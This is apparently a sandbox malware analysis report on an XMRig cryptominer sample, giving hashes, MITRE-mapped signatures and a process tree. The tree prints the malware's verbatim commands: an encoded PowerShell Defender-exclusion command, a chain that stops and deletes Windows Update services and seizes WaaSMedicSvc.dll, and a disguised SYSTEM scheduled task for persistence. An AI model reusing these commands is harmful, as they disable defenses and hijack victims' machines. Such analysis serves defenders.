xmrig | a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7

Analysis

max time kernel
151s
max time network
149s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
13-11-2022 17:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe
Size

2.5MB
MD5

3db308a4a293420df30a444944f2ccb6
SHA1

4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256

a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512

a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
SSDEEP

49152:BIX8orGKWyNi/abKDNtEgSsoi/hiO0WygnaWjIe1BSORYt3m5rj4A19oo/tGIPIP:bBsi/cKRt1SsoipihWyzcbaqYpm5wA10

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1712-148-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-150-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-152-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-153-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-154-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-156-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-158-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-159-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-160-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-162-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-164-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-165-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1712-167-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1376 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

872 takeown.exe
1176 icacls.exe
1780 takeown.exe
1276 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1496 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

872 takeown.exe
1176 icacls.exe
1780 takeown.exe
1276 icacls.exe

pid	process
1376	updater.exe

pid	process
872	takeown.exe
1176	icacls.exe
1780	takeown.exe
1276	icacls.exe

pid	process
1496	taskeng.exe

pid	process
872	takeown.exe
1176	icacls.exe
1780	takeown.exe
1276	icacls.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1908 set thread context of 1712 1908 conhost.exe notepad.exe

description	pid	process	target process
PID 1908 set thread context of 1712	1908	conhost.exe	notepad.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1568 sc.exe
1340 sc.exe
1080 sc.exe
1116 sc.exe
1336 sc.exe
616 sc.exe
1028 sc.exe
284 sc.exe
728 sc.exe
1068 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1892 schtasks.exe

pid	process
1568	sc.exe
1340	sc.exe
1080	sc.exe
1116	sc.exe
1336	sc.exe
616	sc.exe
1028	sc.exe
284	sc.exe
728	sc.exe
1068	sc.exe

pid	process
1892	schtasks.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

conhost.exepowershell.exenotepad.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	notepad.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	notepad.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	notepad.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 8031bf6282f7d801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	notepad.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1344	reg.exe
520	reg.exe
1996	reg.exe
1240	reg.exe
1732	reg.exe
1592	reg.exe
540	reg.exe
636	reg.exe
1780	reg.exe
2000	reg.exe
1832	reg.exe
1936	reg.exe
636	reg.exe
1924	reg.exe
616	reg.exe
836	reg.exe
1620	reg.exe
572	reg.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exenotepad.exe

pid	process
1544	powershell.exe
1688	conhost.exe
1916	powershell.exe
1908	conhost.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe
1712	notepad.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exenotepad.exe

description	pid	process
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeShutdownPrivilege	1100	powercfg.exe
Token: SeDebugPrivilege	1688	conhost.exe
Token: SeShutdownPrivilege	1888	powercfg.exe
Token: SeShutdownPrivilege	2040	powercfg.exe
Token: SeShutdownPrivilege	1508	powercfg.exe
Token: SeTakeOwnershipPrivilege	872	takeown.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeShutdownPrivilege	1312	powercfg.exe
Token: SeShutdownPrivilege	900	powercfg.exe
Token: SeShutdownPrivilege	1596	powercfg.exe
Token: SeShutdownPrivilege	1176	powercfg.exe
Token: SeTakeOwnershipPrivilege	1780	takeown.exe
Token: SeDebugPrivilege	1908	conhost.exe
Token: SeLockMemoryPrivilege	1712	notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1492 wrote to memory of 1688	1492	a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe	conhost.exe
PID 1492 wrote to memory of 1688	1492	a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe	conhost.exe
PID 1492 wrote to memory of 1688	1492	a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe	conhost.exe
PID 1492 wrote to memory of 1688	1492	a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe	conhost.exe
PID 1688 wrote to memory of 1544	1688	conhost.exe	powershell.exe
PID 1688 wrote to memory of 1544	1688	conhost.exe	powershell.exe
PID 1688 wrote to memory of 1544	1688	conhost.exe	powershell.exe
PID 1688 wrote to memory of 1552	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1552	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1552	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 832	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 832	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 832	1688	conhost.exe	cmd.exe
PID 1552 wrote to memory of 1568	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1568	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1568	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 616	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 616	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 616	1552	cmd.exe	sc.exe
PID 832 wrote to memory of 1100	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 1100	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 1100	832	cmd.exe	powercfg.exe
PID 1552 wrote to memory of 1336	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1336	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1336	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1340	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1340	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1340	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1080	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1080	1552	cmd.exe	sc.exe
PID 1552 wrote to memory of 1080	1552	cmd.exe	sc.exe
PID 832 wrote to memory of 1888	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 1888	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 1888	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 2040	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 2040	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 2040	832	cmd.exe	powercfg.exe
PID 1552 wrote to memory of 2000	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 2000	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 2000	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 836	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 836	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 836	1552	cmd.exe	reg.exe
PID 832 wrote to memory of 1508	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 1508	832	cmd.exe	powercfg.exe
PID 832 wrote to memory of 1508	832	cmd.exe	powercfg.exe
PID 1552 wrote to memory of 1344	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 1344	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 1344	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 520	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 520	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 520	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 1996	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 1996	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 1996	1552	cmd.exe	reg.exe
PID 1552 wrote to memory of 872	1552	cmd.exe	takeown.exe
PID 1552 wrote to memory of 872	1552	cmd.exe	takeown.exe
PID 1552 wrote to memory of 872	1552	cmd.exe	takeown.exe
PID 1552 wrote to memory of 1176	1552	cmd.exe	icacls.exe
PID 1552 wrote to memory of 1176	1552	cmd.exe	icacls.exe
PID 1552 wrote to memory of 1176	1552	cmd.exe	icacls.exe
PID 1688 wrote to memory of 772	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 772	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 772	1688	conhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe
"C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"
2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1568

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1336

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1340

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:616

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1080

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:836

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1344

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:520

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1996

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1176

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:540

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1832

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:636

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1780

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1732

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1924

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1120

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1136

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:772

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:1892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1112

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1616

C:\Windows\system32\taskeng.exe
taskeng.exe {8279FD5C-C10A-45C1-89F4-E0A5A1037A44} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1496

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
PID:1376

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1632

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1028

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:284

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1116

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:728

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1068

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1620

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1240

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:572

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1936

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:636

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1276

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1732

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1924

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:616

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1592

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1120

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1136

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1600

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
